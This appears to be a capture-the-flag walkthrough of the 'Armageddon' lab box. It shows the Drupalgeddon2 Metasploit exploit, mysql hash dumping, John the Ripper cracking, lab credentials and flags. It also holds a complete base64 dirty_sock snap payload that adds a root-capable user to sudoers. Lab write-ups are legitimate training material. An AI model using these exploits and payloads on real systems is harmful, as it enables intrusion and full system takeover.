ARMAGEDDON WALKTHROUGH

1. Nmap Scan:

2. Gobuster Scan:

3. Then I went to each directory mentioned in the Gobuster scan. /sites include the settings.php that contained the credentials of the database user.

use the exploit: exploit/unix/webapp/drupal_drupalgeddon2 in msfconsole to exploit the Drupal vulnerability. Set the appropriate value and run the exploit and we get the meterpreter shell. 

Username: drupaluser

Password: CQHEy@9M*m23gBVj

4. Then run the command:

mysql -u drupaluser -h localhost -p -D drupal -e ‘select name,pass from users;’

Password: CQHEy@9M*m23gBVj

We got the hash of the admin brucetherealadmin.

5. Next, we create a simple hash.txt file on the desktop and paste the above hash in it. Then use the john the ripper tool to crack it: 

john hash.txt -w /usr/share/wordlists/rockyou.txt

And we got the password for the admin.

Username: brucetherealadmin

Password: booboo

6. Login ssh and got the user.txt

User.txt: 56f8bc6377eca727f2283581c846c0df

7. Now lets find which things are run as root.

So the user can install the snap without root permissions. So we can install the malicious snap which is obtained from here. It is installed by the following way:

The above command is as follows:

python2 -c ‘print “aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw” + “A”*4256 + “==”’ | base64 -d > leet.snap

**Beware of the (" ' ). linux gives you error.

8. Type run sudo -i to get root pervileges. Use dirty_sock as password if asked.

Root.txt: 5578a4c7888a6ae9c08fee3480c97239

Thanks